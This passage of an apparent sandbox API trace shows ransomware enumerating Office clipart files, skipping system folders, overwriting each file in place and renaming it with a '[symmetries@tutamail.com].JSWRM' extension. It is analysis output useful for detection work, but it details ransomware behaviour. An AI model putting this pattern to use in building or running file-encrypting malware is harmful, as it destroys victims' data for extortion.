lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0091.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.546] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1544) returned 1 [0091.546] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x600) returned 0x2332c0 [0091.546] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0091.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.548] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0091.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0091.549] CloseHandle (hObject=0x314) returned 1 [0091.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0091.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0091.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0091.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0091.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.549] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0091.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0091.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0091.550] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00810_.WMF", cAlternateFileName="")) returned 1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2=".") returned 1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="..") returned 1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="...") returned 1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="windows") returned -1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="recovery") returned -1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="perflogs") returned -1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="documents and settings") returned 1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="system volume information") returned -1 [0091.550] lstrcmpiW (lpString1="NA00810_.WMF", lpString2="msocache") returned 1 [0091.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0091.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00810_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00810_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00810_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0091.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00810_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00810_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00810_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.551] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3416) returned 1 [0091.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd50) returned 0x23fc98 [0091.551] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd50, lpOverlapped=0x0) returned 1 [0091.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.554] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd50, lpOverlapped=0x0) returned 1 [0091.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.555] CloseHandle (hObject=0x314) returned 1 [0091.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0091.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0091.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0091.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0091.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0091.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0091.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0091.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0091.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.556] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3210, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00932_.WMF", cAlternateFileName="")) returned 1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2=".") returned 1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="..") returned 1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="...") returned 1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="windows") returned -1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="recovery") returned -1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="perflogs") returned -1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="documents and settings") returned 1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="system volume information") returned -1 [0091.556] lstrcmpiW (lpString1="NA00932_.WMF", lpString2="msocache") returned 1 [0091.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00932_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00932_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00932_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0091.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00932_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00932_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00932_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0091.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.557] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12816) returned 1 [0091.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3210) returned 0x24d210 [0091.557] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3210, lpOverlapped=0x0) returned 1 [0091.566] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.566] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3210, lpOverlapped=0x0) returned 1 [0091.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.567] CloseHandle (hObject=0x314) returned 1 [0091.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0091.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0091.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0091.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0091.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0091.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.567] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0091.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.568] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c46, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01064_.WMF", cAlternateFileName="")) returned 1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2=".") returned 1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="..") returned 1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="...") returned 1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="windows") returned -1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="recovery") returned -1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="perflogs") returned -1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="documents and settings") returned 1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="system volume information") returned -1 [0091.568] lstrcmpiW (lpString1="NA01064_.WMF", lpString2="msocache") returned 1 [0091.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0091.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01064_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01064_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01064_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0091.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0091.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01064_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01064_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01064_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0091.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0091.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.569] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31814) returned 1 [0091.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c40) returned 0x24d210 [0091.569] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c40, lpOverlapped=0x0) returned 1 [0091.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.574] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c40, lpOverlapped=0x0) returned 1 [0091.574] HeapFree (in: 